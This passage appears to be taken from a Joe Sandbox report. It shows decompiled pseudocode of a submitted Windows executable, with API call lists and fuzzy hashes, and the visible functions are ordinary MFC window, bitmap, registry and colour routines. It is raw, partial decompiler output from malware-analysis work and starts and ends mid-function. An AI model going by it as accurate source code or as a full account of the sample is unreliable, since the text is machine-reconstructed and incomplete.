                                                      					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                      					_pop(__edi);
                                                      					_pop(__esi);
                                                      					 *0x4465c8 = __eax;
                                                      					_pop(__ebx);
                                                      					if(__eax == 0) {
                                                      						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                      						 *0x4465c8 = __eax;
                                                      					}
                                                      					__ecx = _a116;
                                                      					__ecx = _a116 ^ __ebp;
                                                      					__eax = E0041E5DF(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                      					__ebp =  &_a120;
                                                      					__esp =  &_a120;
                                                      					_pop(__ebp);
                                                      					return __eax;
                                                      				}
                                                      			}























                                                      APIs
                                                      • GetMenuCheckMarkDimensions.USER32 ref: 00404AD5
                                                      • _memset.LIBCMT ref: 00404B37
                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00404B89
                                                      • LoadBitmapA.USER32 ref: 00404BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                      • String ID: $tSC
                                                      • API String ID: 4271682439-84426305
                                                      • Opcode ID: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
                                                      • Instruction ID: f93c5f26688163433edc60361cc36291d0a2f72699a6ff0e350c35afdfd69af5
                                                      • Opcode Fuzzy Hash: 1fb548bed39b3eef695a2972ddbee2fea5d738d9e9ebe4badec35ea53fb165ee
                                                      • Instruction Fuzzy Hash: 153109B2A002099FEB10CFB8DC85ABE7BB5EB84304F15043BE602EB2D1D674D945C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00418F07(void* __ebx, void* __ecx) {
                                                      				void* __ebp;
                                                      				void* _t28;
                                                      				void* _t36;
                                                      				signed char _t37;
                                                      				intOrPtr _t41;
                                                      				void* _t42;
                                                      				void* _t44;
                                                      				intOrPtr _t45;
                                                      				void* _t46;
                                                      
                                                      				_t39 = __ecx;
                                                      				_t36 = __ebx;
                                                      				_t41 =  *((intOrPtr*)(_t46 + 0x10));
                                                      				if(_t41 == 0) {
                                                      					_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                      					L14:
                                                      					_t42 = E00409C97(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
                                                      					if(_t42 != 0) {
                                                      						L7:
                                                      						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
                                                      							L18:
                                                      							return _t42;
                                                      						}
                                                      						_push(_t36);
                                                      						_t37 =  *(_t46 + 0x1c);
                                                      						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
                                                      							if((_t37 & 0x00000002) == 0) {
                                                      								L16:
                                                      								_push(_t37);
                                                      								_push(0);
                                                      								_push(_t42);
                                                      								goto L17;
                                                      							}
                                                      							_t39 = _t42;
                                                      							if(E0040CA70(_t42) != 0) {
                                                      								goto L16;
                                                      							}
                                                      							goto L12;
                                                      						} else {
                                                      							L12:
                                                      							_push(_t37);
                                                      							_push(_t42);
                                                      							_push(_t45);
                                                      							L17:
                                                      							_t42 = E00418F07(_t37, _t39);
                                                      							goto L18;
                                                      						}
                                                      					}
                                                      					return _t45;
                                                      				}
                                                      				_t28 = E00409C97(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
                                                      				_t45 =  *((intOrPtr*)(_t46 + 0x10));
                                                      				while(_t28 == 0) {
                                                      					_t41 = E00418EB2(_t45, E00409C97(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
                                                      					if(_t41 == 0 || _t41 == _t45) {
                                                      						goto L14;
                                                      					} else {
                                                      						_t28 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                      						continue;
                                                      					}
                                                      				}
                                                      				_t42 = E00409C97(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
                                                      				goto L7;
                                                      			}













                                                      APIs
                                                      Similarity
                                                      • API ID: Window$LongParentVisible
                                                      • String ID:
                                                      • API String ID: 506644340-0
                                                      • Opcode ID: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
                                                      • Instruction ID: 5631cdc5cc6889daffde78f578d4d612bd2c5089616566f59ea8a3a8e6a984d0
                                                      • Opcode Fuzzy Hash: 46e72c5683fd03fb34599a0f95d5ff76554a5fa3dadfd6045a368a77cb432448
                                                      • Instruction Fuzzy Hash: EE21F832A047146BD6206B758C09FEB779DBF84754F050A2EF985A7291DB2CEC41C698
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00406653(intOrPtr __ecx) {
                                                      				void* _v8;
                                                      				void* _v12;
                                                      				void* _v16;
                                                      				int _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _t32;
                                                      
                                                      				_t32 = __ecx;
                                                      				_v24 = __ecx;
                                                      				_v16 = 0;
                                                      				_v8 = 0;
                                                      				_v12 = 0;
                                                      				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                      					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				if(_v12 != 0) {
                                                      					RegCloseKey(_v12);
                                                      				}
                                                      				return _v16;
                                                      			}










                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00406681
                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066A4
                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004066C0
                                                      • RegCloseKey.ADVAPI32(?), ref: 004066D0
                                                      • RegCloseKey.ADVAPI32(?), ref: 004066DA
                                                      Strings
                                                      Similarity
                                                      • API ID: CloseCreate$Open
                                                      • String ID: software
                                                      • API String ID: 1740278721-2010147023
                                                      • Opcode ID: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
                                                      • Instruction ID: bc813771eb951e0115408790e1de8cf4d033a672c96248005cb1173a93d838a7
                                                      • Opcode Fuzzy Hash: 82500bd82a10186b28fc24c1a7056618e6e1782bf6ab030e2217d6fa9fd66f96
                                                      • Instruction Fuzzy Hash: 4F11F876E01158FBCB21DF9ADD84CEFBFBCEF85750B1040AAA601A2121D2719A14DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0040F402(void* __ecx, long* __edi, void* __esi) {
                                                      				long _t22;
                                                      				void* _t23;
                                                      				void* _t28;
                                                      				void* _t31;
                                                      				void* _t33;
                                                      				signed int _t35;
                                                      				long* _t40;
                                                      				void* _t41;
                                                      				void* _t42;
                                                      
                                                      				_t41 = __esi;
                                                      				_t40 = __edi;
                                                      				_t31 = __ecx;
                                                      				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                      				E0041F7F4(0, 0);
                                                      				_t22 = E0040EAD1(_t31, 0, __edi[3], 4);
                                                      				_t33 = 2;
                                                      				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                      				_t46 = _t23;
                                                      				if(_t23 == 0) {
                                                      					LeaveCriticalSection( *(_t42 - 0x14));
                                                      					_t23 = E004037AF(0, _t33, __edi, __esi, _t46);
                                                      				}
                                                      				 *(_t41 + 0xc) = _t23;
                                                      				E0041F330(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                      				 *(_t41 + 8) = _t40[3];
                                                      				TlsSetValue( *_t40, _t41);
                                                      				_t35 =  *(_t42 + 8);
                                                      				_t28 =  *(_t41 + 0xc);
                                                      				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                      					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                      				}
                                                      				_push( *(_t42 - 0x14));
                                                      				LeaveCriticalSection();
                                                      				return E0041F7C2(_t28);
                                                      			}













                                                      APIs
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040F409
                                                      • __CxxThrowException@8.LIBCMT ref: 0040F413
                                                        • Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834
                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004), ref: 0040F42A
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F437
                                                        • Part of subcall function 004037AF: __CxxThrowException@8.LIBCMT ref: 004037C3
                                                      • _memset.LIBCMT ref: 0040F456
                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 0040F467
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181,00000000), ref: 0040F488
                                                      Similarity
                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                      • String ID:
                                                      • API String ID: 356813703-0
                                                      • Opcode ID: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
                                                      • Instruction ID: fd93560edbf6851b4f3960d9b72a4f37630a2f2519325dc6941088bc0f039299
                                                      • Opcode Fuzzy Hash: 9a583ed615a21241be3b18dce36bb94a94ae7a546afbdb5bd567d3504d28efd3
                                                      • Instruction Fuzzy Hash: DC11C274100605AFCB20AF50DC89C6BBBA9FF54308760C13EF816A25A1CB34AE95CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040EF21(void* __ecx) {
                                                      				struct HBRUSH__* _t14;
                                                      				void* _t18;
                                                      
                                                      				_t18 = __ecx;
                                                      				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                      				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                      				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                      				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                      				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                      				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                      				_t14 = GetSysColorBrush(6);
                                                      				 *(_t18 + 0x20) = _t14;
                                                      				return _t14;
                                                      			}






                                                      APIs
                                                      • GetSysColor.USER32(0000000F), ref: 0040EF2D
                                                      • GetSysColor.USER32(00000010), ref: 0040EF34
                                                      • GetSysColor.USER32(00000014), ref: 0040EF3B
                                                      • GetSysColor.USER32(00000012), ref: 0040EF42
                                                      • GetSysColor.USER32(00000006), ref: 0040EF49
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0040EF56
                                                      • GetSysColorBrush.USER32(00000006), ref: 0040EF5D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Color$Brush
                                                      • String ID:
                                                      • API String ID: 2798902688-0
                                                      • Opcode ID: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
                                                      • Instruction ID: f59acb6467372613553c355d87f79defc1ce8ae1078b4449624b824b30ee7355
                                                      • Opcode Fuzzy Hash: 6b616b1b9c3c417a51a19aefae0052fa6c7b88ea5b2225527b113589cbbc0862
                                                      • Instruction Fuzzy Hash: F0F0F871A407489BD730BB729D09B47BAE1EFC4B10F02192ED2818BA90E6B6E0409F44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00433C38() {
                                                      				long _t5;
                                                      				int _t6;
                                                      
                                                      				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                      					_t5 = GetVersion();
                                                      					if((0x80000000 & _t5) != 0) {
                                                      						L5:
                                                      						 *0x44680c =  *0x44680c & 0x00000000;
                                                      						return _t5;
                                                      					}
                                                      					_t5 = GetVersion();
                                                      					if(_t5 != 3) {
                                                      						goto L5;
                                                      					}
                                                      					goto L4;
                                                      				} else {
                                                      					L4:
                                                      					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                      					 *0x44680c = _t6;
                                                      					return _t6;
                                                      				}
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Version$ClipboardFormatRegister
                                                      • String ID: MSWHEEL_ROLLMSG
                                                      • API String ID: 2888461884-2485103130
                                                      • Opcode ID: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
                                                      • Instruction ID: 4356ce2cf077731b6ec7b5d007e1485f223b33f16df30197ff0064379991df0c
                                                      • Opcode Fuzzy Hash: 6e13466c39be63d6abcca6283d65c4debe34d0bda91c07c1490ada4aa240426f
                                                      • Instruction Fuzzy Hash: 30E04F7B8015135EE7112F69BC043A627945BAE392F56B03B9D01A22509A3C19438EBE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00405957(struct HWND__* _a4, struct HWND__** _a8) {
                                                      				struct HWND__* _t7;
                                                      				void* _t13;
                                                      				struct HWND__** _t15;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t17;
                                                      				struct HWND__* _t18;
                                                      
                                                      				_t18 = _a4;
                                                      				_t17 = _t18;
                                                      				if(_t18 != 0) {
                                                      					L5:
                                                      					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                      						L8:
                                                      						_t16 = _t17;
                                                      						_t7 = _t17;
                                                      						if(_t17 == 0) {
                                                      							L10:
                                                      							if(_t18 == 0 && _t17 != 0) {
                                                      								_t17 = GetLastActivePopup(_t17);
                                                      							}
                                                      							_t15 = _a8;
                                                      							if(_t15 != 0) {
                                                      								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                      									 *_t15 =  *_t15 & 0x00000000;
                                                      								} else {
                                                      									 *_t15 = _t16;
                                                      									EnableWindow(_t16, 0);
                                                      								}
                                                      							}
                                                      							return _t17;
                                                      						} else {
                                                      							goto L9;
                                                      						}
                                                      						do {
                                                      							L9:
                                                      							_t16 = _t7;
                                                      							_t7 = GetParent(_t7);
                                                      						} while (_t7 != 0);
                                                      						goto L10;
                                                      					}
                                                      					_t17 = GetParent(_t17);
                                                      					L7:
                                                      					if(_t17 != 0) {
                                                      						goto L5;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				_t13 = E00405880();
                                                      				if(_t13 != 0) {
                                                      					L4:
                                                      					_t17 =  *(_t13 + 0x20);
                                                      					goto L7;
                                                      				}
                                                      				_t13 = E00403ED6();
                                                      				if(_t13 != 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t17 = 0;
                                                      				goto L8;
                                                      			}










                                                      APIs
                                                      • GetWindowLongA.USER32 ref: 00405989
                                                      • GetParent.USER32(00401257), ref: 00405997
                                                      • GetParent.USER32(00401257), ref: 004059AA
                                                      • GetLastActivePopup.USER32(00401257), ref: 004059B9
                                                      • IsWindowEnabled.USER32(00401257), ref: 004059CE
                                                      • EnableWindow.USER32(00401257,00000000), ref: 004059E1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                      • String ID:
                                                      • API String ID: 670545878-0
                                                      • Opcode ID: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
                                                      • Instruction ID: 0fd042f9c84c3817d672c4b8ef0a745a4829e1649fc024bfe0b5622049980979
                                                      • Opcode Fuzzy Hash: 3b1ec5fce5c6df1d94cf4d325c1fcdaf986b697a71e109a9ef266bcaa307bb9b
                                                      • Instruction Fuzzy Hash: 52118CB2605B21DBD6222A699844B6BB69CDF64B70F150136EC00F3395DB78DC019EED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 38%
                                                      			E0040F839(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                      				struct tagRECT _v20;
                                                      				struct HWND__* _t12;
                                                      				struct HWND__* _t21;
                                                      
                                                      				ClientToScreen(_a4,  &_a8);
                                                      				_push(5);
                                                      				_push(_a4);
                                                      				while(1) {
                                                      					_t12 = GetWindow();
                                                      					_t21 = _t12;
                                                      					if(_t21 == 0) {
                                                      						break;
                                                      					}
                                                      					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                      						GetWindowRect(_t21,  &_v20);
                                                      						_push(_a12);
                                                      						if(PtInRect( &_v20, _a8) != 0) {
                                                      							return _t21;
                                                      						}
                                                      					}
                                                      					_push(2);
                                                      					_push(_t21);
                                                      				}
                                                      				return _t12;
                                                      			}







                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                      • String ID:
                                                      • API String ID: 1315500227-0
                                                      • Opcode ID: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
                                                      • Instruction ID: f664ab31a6303e9d539a40d152b99c50a5e09be0de03728c9acbdc8a8ff8b10d
                                                      • Opcode Fuzzy Hash: b6dff1484203bce84157c908e257711b99aee86806842bf46e6917bca70776a7
                                                      • Instruction Fuzzy Hash: E2016236600515ABDB216F94DC08EEF376CEF84751F048136FD11B75A0D738EA158B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E00410A89(intOrPtr __ebx, void** __ecx, void* __edx, intOrPtr __esi, char* _a4, short _a8) {
                                                      				signed int _v8;
                                                      				short _v72;
                                                      				char* _v76;
                                                      				signed int _v80;
                                                      				signed int* _v84;
                                                      				signed int _v88;
                                                      				intOrPtr _v92;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				signed int _t54;
                                                      				intOrPtr _t66;
                                                      				short* _t70;
                                                      				signed int _t72;
                                                      				signed int _t81;
                                                      				signed int* _t83;
                                                      				short* _t84;
                                                      				void* _t91;
                                                      				signed int* _t98;
                                                      				signed int _t99;
                                                      				void** _t100;
                                                      				intOrPtr _t102;
                                                      				signed int _t104;
                                                      				signed int _t106;
                                                      				void* _t107;
                                                      
                                                      				_t101 = __esi;
                                                      				_t97 = __edx;
                                                      				_t82 = __ebx;
                                                      				_t54 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t54 ^ _t106;
                                                      				_t100 = __ecx;
                                                      				_v76 = _a4;
                                                      				if(__ecx[1] != 0) {
                                                      					_push(__ebx);
                                                      					_push(__esi);
                                                      					_t83 = GlobalLock( *__ecx);
                                                      					_v84 = _t83;
                                                      					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                      					_v80 = E004108CC(_t83);
                                                      					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                      					_v92 = _t102;
                                                      					if(_v88 == 0) {
                                                      						 *_t83 =  *_t83 | 0x00000040;
                                                      					} else {
                                                      						_t83[3] = _t83[3] | 0x00000040;
                                                      					}
                                                      					if(lstrlenA(_v76) >= 0x20) {
                                                      						L15:
                                                      						_t66 = 0;
                                                      					} else {
                                                      						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                      						_v76 = _t97;
                                                      						if(_t97 < _t102) {
                                                      							goto L15;
                                                      						} else {
                                                      							_t70 = E004108F7(_t83);
                                                      							_t91 = 0;
                                                      							_t84 = _t70;
                                                      							if(_v80 != 0) {
                                                      								_t81 = E0041E982(_t84 + _t102);
                                                      								_t97 = _v76;
                                                      								_t91 = _t102 + 2 + _t81 * 2;
                                                      							}
                                                      							_t33 = _t97 + 3; // 0x3
                                                      							_t98 = _v84;
                                                      							_t36 = _t84 + 3; // 0x10002
                                                      							_t72 = _t91 + _t36 & 0xfffffffc;
                                                      							_t104 = _t84 + _t33 & 0xfffffffc;
                                                      							_v80 = _t72;
                                                      							if(_v88 == 0) {
                                                      								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                      							} else {
                                                      								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                      							}
                                                      							if(_v76 == _t91 || _t99 <= 0) {
                                                      								L17:
                                                      								 *_t84 = _a8;
                                                      								_t97 =  &_v72;
                                                      								E00410A0C(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                      								_t100[1] = _t100[1] + _t104 - _v80;
                                                      								GlobalUnlock( *_t100);
                                                      								_t100[2] = _t100[2] & 0x00000000;
                                                      								_t66 = 1;
                                                      							} else {
                                                      								_t97 = _t100[1];
                                                      								_t95 = _t97 - _t72 + _v84;
                                                      								if(_t97 - _t72 + _v84 <= _t97) {
                                                      									E00410A0C(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                      									_t107 = _t107 + 0x10;
                                                      									goto L17;
                                                      								} else {
                                                      									goto L15;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_pop(_t101);
                                                      					_pop(_t82);
                                                      				} else {
                                                      					_t66 = 0;
                                                      				}
                                                      				return E0041E5DF(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                      			}




























                                                      APIs
                                                      • GlobalLock.KERNEL32 ref: 00410AB3
                                                      • lstrlenA.KERNEL32(?), ref: 00410AFB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00410B15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                      • String ID: System
                                                      • API String ID: 1529587224-3470857405
                                                      • Opcode ID: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
                                                      • Instruction ID: 77f56c5e0b70ae88688f1258a2549f44d8c60beea92c973b3041d18e2da12858
                                                      • Opcode Fuzzy Hash: 60c34cc932e0d0d5f620731a07cb8a59de673b6203500529a3185df5c7ea08ab
                                                      • Instruction Fuzzy Hash: 8641B171904219DFCB14DFE4C885AEEBBB5FF44318F14812AE412EB285E7B8A9C5CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E004120C5(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
                                                      				intOrPtr _t33;
                                                      				struct HINSTANCE__* _t44;
                                                      				signed int _t45;
                                                      				_Unknown_base(*)()* _t47;
                                                      				intOrPtr _t54;
                                                      				intOrPtr _t59;
                                                      				void* _t77;
                                                      
                                                      				_t76 = __esi;
                                                      				_t75 = __edi;
                                                      				_push(0x20);
                                                      				E0041F753(E00432B84, __ebx, __edi, __esi);
                                                      				_t59 = __ecx;
                                                      				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x43688c;
                                                      				_t33 =  *((intOrPtr*)(__ecx + 0x44));
                                                      				 *(_t77 - 4) = 2;
                                                      				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
                                                      				if(_t33 == 0) {
                                                      					L7:
                                                      					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
                                                      						L12:
                                                      						E00419E18(_t59, _t59 + 0x24, _t75);
                                                      						E0040ED13(_t59 + 0x64);
                                                      						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
                                                      						_push(_t77 - 0x20);
                                                      						if(E0040EEC3(_t59, 0x4393e0) >= 0) {
                                                      							_t76 = "mfcm80.dll";
                                                      							_t75 = _t77 - 0x1c;
                                                      							asm("movsd");
                                                      							asm("movsd");
                                                      							asm("movsw");
                                                      							asm("movsb");
                                                      							_t44 = GetModuleHandleA(_t77 - 0x1c);
                                                      							if(_t44 != 0) {
                                                      								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
                                                      								if(_t47 != 0) {
                                                      									 *_t47( *(_t77 - 0x20));
                                                      								}
                                                      							}
                                                      							_t45 =  *(_t77 - 0x20);
                                                      							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                      						}
                                                      						 *(_t77 - 4) = 1;
                                                      						E0041A1FB(_t59 + 0x40);
                                                      						 *(_t77 - 4) = 0;
                                                      						E00419FED(_t59, _t59 + 0x24, _t75);
                                                      						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                                      						E00404913(_t59);
                                                      						return E0041F7D6(_t59, _t75, _t76);
                                                      					}
                                                      					_t75 = _t59 + 0x40;
                                                      					do {
                                                      						_t76 = E0041A142(_t59, _t75, _t75, _t76);
                                                      						_t85 = _t76;
                                                      						if(_t76 != 0) {
                                                      							E00411888(_t76);
                                                      							_push(_t76);
                                                      							E00402F0C(_t59, _t75, _t76, _t85);
                                                      						}
                                                      					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
                                                      					goto L12;
                                                      				} else {
                                                      					_t75 = __ecx + 0x40;
                                                      					do {
                                                      						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
                                                      						_t76 =  *((intOrPtr*)(E00406B97(_t77 - 0x24)));
                                                      						if(_t76 != 0) {
                                                      							_t54 =  *((intOrPtr*)(_t76 + 4));
                                                      							if(_t54 != 0) {
                                                      								_t82 =  *((intOrPtr*)(_t54 + 0x90));
